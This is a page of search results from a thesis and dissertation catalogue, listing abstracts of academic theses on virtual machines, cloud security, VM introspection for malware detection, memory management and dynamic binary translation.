• Refine Query
  • Source
  • Publication year
  • to
  • Language
  • 36
  • 23
  • 6
  • 1
  • 1
  • 1
  • 1
  • 1
  • 1
  • Tagged with
  • 82
  • 82
  • 26
  • 25
  • 25
  • 16
  • 15
  • 14
  • 14
  • 14
  • 13
  • 12
  • 11
  • 11
  • 9
  • About
  • The Global ETD Search service is a free service for researchers to find electronic theses and dissertations. This service is provided by the Networked Digital Library of Theses and Dissertations.
    Our metadata is collected from universities around the world. If you manage a university/consortium/country archive and want to be added, details can be found on the NDLTD website.
31

Analysis and Detection of Heap-based Malwares Using Introspection in a Virtualized Environment

Javaid, Salman 13 August 2014 (has links)
Malware detection and analysis is a major part of computer security. There is an arm race between security experts and malware developers to develop various techniques to secure computer systems and to find ways to circumvent these security methods. In recent years process heap-based attacks have increased significantly. These attacks exploit the system under attack via the heap, typically by using a heap spraying attack. The main drawback with existing techniques is that they either consume too many resources or are complicated to implement. Our work in this thesis focuses on new methods which offloads process heap analysis for guest Virtual Machines (VM) to the privileged domain using Virtual Machine Introspection (VMI) in a Cloud environment. VMI provides us with a seamless, non-intrusive and invisible (to malwares) way of observing the memory and state of VMs without raising red flags for the malwares.
32

An Investigation of the Impact of the Slow HTTP DOS and DDOS attacks on the Cloud environment

Helalat, Seyed Milad January 2017 (has links)
Cloud computing has brought many benefits to the IT industry, and could reduce the cost and facilitate the growth of businesses specially the startup companies which don’t have enough financial resources to build their own IT infrastructure. One of the main reason that companies hesitate to use cloud services is the security issues that the cloud computing technology has. This thesis at the beginning has an overview on the cloud computing concept and then reviews the cloud security vulnerabilities according to the cloud security alliance, then it describes the cloud denial of service and will focus on analyzing the Slow HTTP DOS attack and then will analyze the direct and indirect impact of these attacks on virtual machines. We decided to analyze the HTTP slow rate attacks because of the craftiness and covered characteristic also the catastrophic impact of the Slow HTTP attack whether it’s lunched on the cloud component or lunched from the cloud. There are some researches on the different way that a web server or web service can be protected against slow HTTP attacks, but there is a research gap about the impact of the attack on virtual environment or whether this attack has cross VM impact or not. This thesis investigates the impact of Slow HTTP attack on virtualization environment and will analyze the direct and indirect impact of these attack. For analyzing the Slow HTTP attacks, Slow headers, Slow body and Slow read are implemented using Slowhttptest and OWASP Switchblade software, and Wireshark is used to capture the traffic. For analyzing the impact of the attack, attacks are lunched on VirtualBox and the impact of the attack on the victim VM and neighbor VM is measured.
33

Memory Dispatcher: uma contribuição para a gerência de recursos em ambientes virtualizados. / Memory Dispatcher: a contribution to resource management in virtual environments.

Baruchi, Artur 26 March 2010 (has links)
As Máquinas Virtuais ganharam grande importância com o advento de processadores multi-core (na plataforma x86) e com o barateamento de componentes de hardware, como a memória. Por conta desse substancial aumento do poder computacional, surgiu o desafio de tirar proveito dos recursos ociosos encontrados nos ambientes corporativos, cada vez mais populados por equipamentos multi-core e com vários Gigabytes de memória. A virtualização, mesmo sendo um conceito já antigo, tornou-se novamente popular neste cenário, pois com ela foi possível utilizar melhor os recursos computacionais, agora abundantes. Este trabalho tem como principal foco estudar algumas das principais técnicas de gerência de recursos computacionais em ambientes virtualizados. Apesar de muitos dos conceitos aplicados nos projetos de Monitores de Máquinas Virtuais terem sido portados de Sistemas Operacionais convencionais com pouca, ou nenhuma, alteração; alguns dos recursos ainda são difíceis de virtualizar com eficiência devido a paradigmas herdados desses mesmos Sistemas Operacionais. Por fim, é apresentado o Memory Dispatcher (MD), um mecanismo de gerenciamento de memória, com o objetivo principal de distribuir a memória entre as Máquinas Virtuais de modo mais eficaz. Este mecanismo, implementado em C, foi testado no Monitor de Máquinas Virtuais Xen e apresentou ganhos de memória de até 70%. / Virtual Machines have gained great importance with advent of multi-core processors (on platform x86) and with low cost of hardware parts, like physical memory. Due to this computational power improvement a new challenge to take advantage of idle resources has been created. The virtualization technology, even being an old concept became popular in research centers and corporations. With this technology idle resources now can be exploited. This work has the objective to show the main techniques to manage computational resources in virtual environments. Although many of current concepts used in Virtual Machine Monitors project has been ported, with minimal changes, from conventional Operating Systems there are some resources that are difficult to virtualize with efficiency due to old paradigms still present in Operating Systems projects. Finally, the Memory Dispatcher (MD) is presented, a mechanism used to memory management. The main objective of MD is to improve the memory share among Virtual Machines. This mechanism was developed in C and it was tested in Xen Virtual Machine Monitor. The MD showed memory gains up to 70%.
34

[en] INTEGRATING THE LUA LANGUAGE AND THE COMMON LANGUAGE RUNTIME / [pt] INTEGRAÇÃO ENTRE A LINGUAGEM LUA E O COMMON LANGUAGE RUNTIME

FABIO MASCARENHAS DE QUEIROZ 27 May 2004 (has links)
[pt] O Common Language Runtime (CLR) é uma plataforma criada com o objetivo de facilitar a interoperabilidade entre diferentes linguagens de programação, através de uma linguagem intermediária (a Common Intermediate Language, ou CIL) e um sistema de tipos comum (o Common Type System, ou CTS). Lua é uma linguagem de script flexível e de sintaxe simples; linguagens de script são frequentemente usadas para juntar componentes escritos em outras linguagens, para construir protótipos de aplicações, e em arquivos de configuração. Este trabalho apresenta duas abordagens de integração entre a linguagem Lua e o CLR, com o objetivo de permitir que scripts Lua instanciem e usem componentes escritos para o CLR. A primeira abordagem é a de criar uma ponte entre o interpretador Lua e o CLR, sem modificar o interpretador. Os recursos e a implementação desta ponte são mostrados, e ela é comparada com trabalhos que seguem a mesma abordagem. A segunda abordagem é a de compilar as instruções da máquina virtual do interpretador Lua para instruções da Common Intermediate Language Do CLR, sem introduzir mudanças na linguagem Lua. A implementação de um compilador de instruções Lua para CIL é mostrada, e o desempenho de scripts compilados por ele é comparado com o desempenho dos mesmos scripts executados pelo interpretador Lua e com o de scripts equivalentes compilados por outros compiladores de linguagens de script para o CLR. / [en] The Common Language Runtime (CLR) is a platform that aims to make the interoperability among different programming languages easier, by using a common language (the Common Intermediate Language, or CIL) and a common type system (the Common Type System, or CTS). Lua is a flexible scripting language with a simple syntax; scripting languages are frequently used to join components written in other languages, to build application prototypes, and in configuration files. This work presents two approachs for integratiion between the Lua language and the CLR, with the objective of allowing Lua scripts to instantiate and use components written for the CLR. The first approach is to create a bridge between the Lua interpreter and the CLR, without changing the interpreter. The features and implementation of this bridge are shown, and it is compared with other work following the same approach. The second approach is to compile the virtual-machine instructions of the Lua interpreter to instructions of the CLR s Common Intermediate Language, without introducing changes to the Lua language. The implementation of a Lua instructions to CIL compiler is shown, and the performance of scripts compiled by it is compared with the performance of the same scripts run by the Lua interpreter and with the performance of equivalent scripts compiled by compilers of other scripting language to the CLR.
35

Applications of information sharing for code generation in process virtual machines

Kyle, Stephen Christopher January 2016 (has links)
As the backbone of many computing environments today, it is important that process virtual machines be both performant and robust in mobile, personal desktop, and enterprise applications. This thesis focusses on code generation within these virtual machines, particularly addressing situations where redundant work is being performed. The goal is to exploit information sharing in order to improve the performance and robustness of virtual machines that are accelerated by native code generation. First, the thesis investigates the potential to share generated code between multiple threads in a dynamic binary translator used to perform instruction set simulation. This is done through a code generation design that allows native code to be executed by any simulated core and adding a mechanism to share native code regions between threads. This is shown to improve the average performance of multi-threaded benchmarks by 1.4x when simulating 128 cores on a quad-core host machine. Secondly, the ahead-of-time code generation system used for executing Android applications is improved through the use of profiling. The thesis investigates the potential for profiles produced by individual users of applications to be shared and merged together to produce a generic profile that still provides a lot of benefit for a new user who is then able to skip the expensive profiling phase. These profiles can not only be used for selective compilation to reduce code-size and installation time, but can also be used for focussed optimisation on vital code regions of an application in order to improve overall performance. With selective compilation applied to a set of popular Android applications, code-size can be reduced by 49.9% on average, while installation time can be reduced by 31.8%, with only an average 8.5% increase in the amount of sequential runtime required to execute the collected profiles. The thesis also shows that, among the tested users, the use of a crowd-sourced and merged profile does not significantly affect their estimated performance loss from selective compilation (0.90x-0.92x) in comparison to when they they perform selective compilation with their own unique profile (0.93x). Furthermore, by proposing a new, more powerful code generator for Android’s virtual machine, these same profiles can be used to perform focussed optimisation, which preliminary results show to increase runtime performance across a set of common Android benchmarks by 1.46x-10.83x. Finally, in such a situation where a new code generator is being added to a virtual machine, it is also important to test the code generator for correctness and robustness. The methods of execution of a virtual machine, such as interpreters and code generators, must share a set of semantics about how programs must be executed, and this can be exploited in order to improve testing. This is done through the application of domain-aware binary fuzzing and differential testing within Android’s virtual machine. The thesis highlights a series of actual code generation and verification bugs that were found in Android’s virtual machine using this testing methodology, as well as comparing the proposed approach to other state-of-the-art fuzzing techniques.
36

Memory Dispatcher: uma contribuição para a gerência de recursos em ambientes virtualizados. / Memory Dispatcher: a contribution to resource management in virtual environments.

Artur Baruchi 26 March 2010 (has links)
As Máquinas Virtuais ganharam grande importância com o advento de processadores multi-core (na plataforma x86) e com o barateamento de componentes de hardware, como a memória. Por conta desse substancial aumento do poder computacional, surgiu o desafio de tirar proveito dos recursos ociosos encontrados nos ambientes corporativos, cada vez mais populados por equipamentos multi-core e com vários Gigabytes de memória. A virtualização, mesmo sendo um conceito já antigo, tornou-se novamente popular neste cenário, pois com ela foi possível utilizar melhor os recursos computacionais, agora abundantes. Este trabalho tem como principal foco estudar algumas das principais técnicas de gerência de recursos computacionais em ambientes virtualizados. Apesar de muitos dos conceitos aplicados nos projetos de Monitores de Máquinas Virtuais terem sido portados de Sistemas Operacionais convencionais com pouca, ou nenhuma, alteração; alguns dos recursos ainda são difíceis de virtualizar com eficiência devido a paradigmas herdados desses mesmos Sistemas Operacionais. Por fim, é apresentado o Memory Dispatcher (MD), um mecanismo de gerenciamento de memória, com o objetivo principal de distribuir a memória entre as Máquinas Virtuais de modo mais eficaz. Este mecanismo, implementado em C, foi testado no Monitor de Máquinas Virtuais Xen e apresentou ganhos de memória de até 70%. / Virtual Machines have gained great importance with advent of multi-core processors (on platform x86) and with low cost of hardware parts, like physical memory. Due to this computational power improvement a new challenge to take advantage of idle resources has been created. The virtualization technology, even being an old concept became popular in research centers and corporations. With this technology idle resources now can be exploited. This work has the objective to show the main techniques to manage computational resources in virtual environments. Although many of current concepts used in Virtual Machine Monitors project has been ported, with minimal changes, from conventional Operating Systems there are some resources that are difficult to virtualize with efficiency due to old paradigms still present in Operating Systems projects. Finally, the Memory Dispatcher (MD) is presented, a mechanism used to memory management. The main objective of MD is to improve the memory share among Virtual Machines. This mechanism was developed in C and it was tested in Xen Virtual Machine Monitor. The MD showed memory gains up to 70%.
37

HW/SW mechanisms for instruction fusion, issue and commit in modern u-processors

Deb, Abhishek 03 May 2012 (has links)
In this thesis we have explored the co-designed paradigm to show alternative processor design points. Specifically, we have provided HW/SW mechanisms for instruction fusion, issue and commit for modern processors. We have implemented a co-designed virtual machine monitor that binary translates x86 instructions into RISC like micro-ops. Moreover, the translations are stored as superblocks, which are a trace of basic blocks. These superblocks are further optimized using speculative and non-speculative optimizations. Hardware mechanisms exists in-order to take corrective action in case of misspeculations. During the course of this PhD we have made following contributions. Firstly, we have provided a novel Programmable Functional unit, in-order to speed up general-purpose applications. The PFU consists of a grid of functional units, similar to CCA, and a distributed internal register file. The inputs of the macro-op are brought from the Physical Register File to the internal register file using a set of moves and a set of loads. A macro-op fusion algorithm fuses micro-ops at runtime. The fusion algorithm is based on a scheduling step that indicates whether the current fused instruction is beneficial or not. The micro-ops corresponding to the macro-ops are stored as control signals in a configuration. The macro-op consists of a configuration ID which helps in locating the configurations. A small configuration cache is present inside the Programmable Functional unit, that holds these configurations. In case of a miss in the configuration cache configurations are loaded from I-Cache. Moreover, in-order to support bulk commit of atomic superblocks that are larger than the ROB we have proposed a speculative commit mechanism. For this we have proposed a Speculative commit register map table that holds the mappings of the speculatively committed instructions. When all the instructions of the superblock have committed the speculative state is copied to Backend Register Rename Table. Secondly, we proposed a co-designed in-order processor with with two kinds of accelerators. These FU based accelerators run a pair of fused instructions. We have considered two kinds of instruction fusion. First, we fused a pair of independent loads together into vector loads and execute them on vector load units. For the second kind of instruction fusion we have fused a pair of dependent simple ALU instructions and execute them in Interlock Collapsing ALUs (ICALU). Moreover, we have evaluated performance of various code optimizations such as list-scheduling, load-store telescoping and load hoisting among others. We have compared our co-designed processor with small instruction window out-of-order processors. Thirdly, we have proposed a co-designed out-of-order processor. Specifically we have reduced complexity in two areas. First of all, we have co-designed the commit mechanism, that enable bulk commit of atomic superblocks. In this solution we got rid of the conventional ROB, instead we introduce the Superblock Ordering Buffer (SOB). SOB ensures program order is maintained at the granularity of the superblock, by bulk committing the program state. The program state consists of the register state and the memory state. The register state is held in a per superblock register map table, whereas the memory state is held in gated store buffer and updated in bulk. Furthermore, we have tackled the complexity of Out-of-Order issue logic by using FIFOs. We have proposed an enhanced steering heuristic that fixes the inefficiencies of the existing dependence-based heuristic. Moreover, a mechanism to release the FIFO entries earlier is also proposed that further improves the performance of the steering heuristic. / En aquesta tesis hem explorat el paradigma de les màquines issue i commit per processadors actuals. Hem implementat una màquina virtual que tradueix binaris x86 a micro-ops de tipus RISC. Aquestes traduccions es guarden com a superblocks, que en realitat no és més que una traça de virtuals co-dissenyades. En particular, hem proposat mecanismes hw/sw per a la fusió d’instruccions, blocs bàsics. Aquests superblocks s’optimitzen utilitzant optimizacions especualtives i d’altres no speculatives. En cas de les optimizations especulatives es consideren mecanismes per a la gestió de errades en l’especulació. Al llarg d’aquesta tesis s’han fet les següents contribucions: Primer, hem proposat una nova unitat functional programmable (PFU) per tal de millorar l’execució d’aplicacions de proposit general. La PFU està formada per un conjunt d’unitats funcionals, similar al CCA, amb un banc de registres intern a la PFU distribuït a les unitats funcionals que la composen. Les entrades de la macro-operació que s’executa en la PFU es mouen del banc de registres físic convencional al intern fent servir un conjunt de moves i loads. Un algorisme de fusió combina més micro-operacions en temps d’execució. Aquest algorisme es basa en un pas de planificació que mesura el benefici de les decisions de fusió. Les micro operacions corresponents a la macro operació s’emmagatzemen com a senyals de control en una configuració. Les macro-operacions tenen associat un identificador de configuració que ajuda a localitzar d’aquestes. Una petita cache de configuracions està present dintre de la PFU per tal de guardar-les. En cas de que la configuració no estigui a la cache, les configuracions es carreguen de la cache d’instruccions. Per altre banda, per tal de donar support al commit atòmic dels superblocks que sobrepassen el tamany del ROB s’ha proposat un mecanisme de commit especulatiu. Per aquest mecanisme hem proposat una taula de mapeig especulativa dels registres, que es copia a la taula no especulativa quan totes les instruccions del superblock han comitejat. Segon, hem proposat un processador en order co-dissenyat que combina dos tipus d’acceleradors. Aquests acceleradors executen un parell d’instruccions fusionades. S’han considerat dos tipus de fusió d’instructions. Primer, combinem un parell de loads independents formant loads vectorials i els executem en una unitat vectorial. Segon, fusionem parells d’instruccions simples d’alu que són dependents i que s’executaran en una Interlock Collapsing ALU (ICALU). Per altra aquestes tecniques les hem evaluat conjuntament amb diverses optimizacions com list scheduling, load-store telescoping i hoisting de loads, entre d’altres. Aquesta proposta ha estat comparada amb un processador fora d’ordre. Tercer, hem proposat un processador fora d’ordre co-dissenyat efficient reduint-ne la complexitat en dos areas principals. En primer lloc, hem co-disenyat el mecanisme de commit per tal de permetre un eficient commit atòmic del superblocks. En aquesta solució hem substituït el ROB convencional, i en lloc hem introduït el Superblock Ordering Buffer (SOB). El SOB manté l’odre de programa a granularitat de superblock. L’estat del programa consisteix en registres i memòria. L’estat dels registres es manté en una taula per superblock, mentre que l’estat de memòria es guarda en un buffer i s’actulitza atòmicament. La segona gran area de reducció de complexitat considerarada és l’ús de FIFOs a la lògica d’issue. En aquest últim àmbit hem proposat una heurística de distribució que solventa les ineficiències de l’heurística basada en dependències anteriorment proposada. Finalment, i junt amb les FIFOs, s’ha proposat un mecanisme per alliberar les entrades de la FIFO anticipadament.
38

Algorithms for efficient VM placement in data centers : Cloud Based Design and Performance Analysis

Atchukatla, Mahammad suhail January 2018 (has links)
Content: Recent trends show that cloud computing adoption is continuously increasing in every organization. So, demand for the cloud datacenters tremendously increases over a period, resulting in significantly increased resource utilization of the datacenters. In this thesis work, research was carried out on optimizing the energy consumption by using packing of the virtual machines in the datacenter. The CloudSim simulator was used for evaluating bin-packing algorithms and for practical implementation OpenStack cloud computing environment was chosen as the platform for this research.   Objectives:  In this research, our objectives are as follows <ul type="disc">Perform simulation of algorithms in CloudSim simulator. Estimate and compare the energy consumption of different packing algorithms. Design an OpenStack testbed to implement the Bin packing algorithm.   Methods: We use CloudSim simulator to estimate the energy consumption of the First fit, the First fit decreasing, Best fit and Enhanced best-fit algorithms. Design a heuristic model for implementation in the OpenStack environment for optimizing the energy consumption for the physical machines. Server consolidation and live migration are used for the algorithms design in the OpenStack implementation. Our research also extended to the Nova scheduler functionality in an OpenStack environment.   Results: Most of the case the enhanced best-fit algorithm gives the better results. The results are obtained from the default OpenStack VM placement algorithm as well as from the heuristic algorithm developed in this simulation work. The comparison of results indicates that the total energy consumption of the data center is reduced without affecting potential service level agreements.   Conclusions: The research tells that energy consumption of the physical machines can be optimized without compromising the offered service quality. A Python wrapper was developed to implement this model in the OpenStack environment and minimize the energy consumption of the Physical machine by shutdown the unused physical machines. The results indicate that CPU Utilization does not vary much when live migration of the virtual machine is performed.
39

Proposal of a strategy for monitoring and management of virtual networks based on open standard openflow

Damalio, Douglas Brito 31 January 2011 (has links)
Made available in DSpace on 2014-06-12T15:58:06Z (GMT). No. of bitstreams: 2 arquivo3252_1.pdf: 2382561 bytes, checksum: c2a06bbc48d03850db39ab0f6ef2859e (MD5) license.txt: 1748 bytes, checksum: 8a4605be74aa9ea9d79846c1fba20a33 (MD5) Previous issue date: 2011 / Conselho Nacional de Desenvolvimento Científico e Tecnológico / Este trabalho apresenta uma proposta para gerenciamento e monitoramento de redes virtuais através da adaptação do Nagios, uma ferramenta de gerência e monitoramento amplamente utilizada em datacenters por administradores de rede. Esta adaptação foi implementada através da criação de um plug-in que coleta dados relevantes de switches virtuais realizando inferências de estados de disponibilidade destes switches. Para verificação da usabilidade do plug-in, foi criada uma rede virtual utilizando o software de padrão aberto Openflow e OpenvSwitch em conjunto com o NOX, além da criação de máquinas virtuais sobre o virtualizador KVM com o auxílio da biblioteca libvirt para criação das máquinas virtuais e interfaces virtuais
40

Indirect branch emulation techniques in virtual machines / Técnicas para emulação de saltos indiretos em máquinas virtuais

Gomes, Gabriel Ferreira Teles, 1985- 07 July 2014 (has links)
Orientador: Edson Borin / Dissertação (mestrado) - Universidade Estadual de Campinas, Instituto de Computação / Made available in DSpace on 2018-08-25T09:40:30Z (GMT). No. of bitstreams: 1 Gomes_GabrielFerreiraTeles_M.pdf: 1568441 bytes, checksum: b0b5fb8e25907bd153706a27a9b597ea (MD5) Previous issue date: 2014 / Resumo: Tradução dinâmica de binários é uma técnica de emulação comumente utilizada na implementação de máquinas virtuais. Neste contexto, a emulação de saltos indiretos é uma das principais fontes de perda de eficiência, o que atrapalha a aplicabilidade de tradutores dinâmicos de binários. Essa dissertação descreve diversas técnicas que tentam melhorar o desempenho e a eficiência da emulação de saltos indiretos em máquinas virtuais eficientes. O DynamoRIO é uma máquina virtual que se enquadra nessa categoria e que utiliza características de diversas dessas técnicas. Nessa dissertação, nós apresentamos a implementação atual do DynamoRIO, modificamos seu código para incluir duas novas técnicas de emulação de saltos indiretos (Inline Caching e IBTC) e as comparamos com outras técnicas descritas na literatura / Abstract: Dynamic binary translation is an emulation technique commonly employed in the implementation of virtual machines. One of the main sources of overhead that hinder the applicability of dynamic binary translators is that caused by the emulation of indirect branch instructions. This master thesis describes several techniques that try to improve the performance and efficiency of indirect branch emulation in efficient virtual machines. DynamoRIO is one of such machines and it implements features used by several of those techniques. In this master thesis, we present current implementations of DynamoRIO, modify its code to include two new techniques (Inline Caching and IBTC) and compare it with other techniques described in the literature / Mestrado / Ciência da Computação / Mestre em Ciência da Computação

Page generated in 0.4544 seconds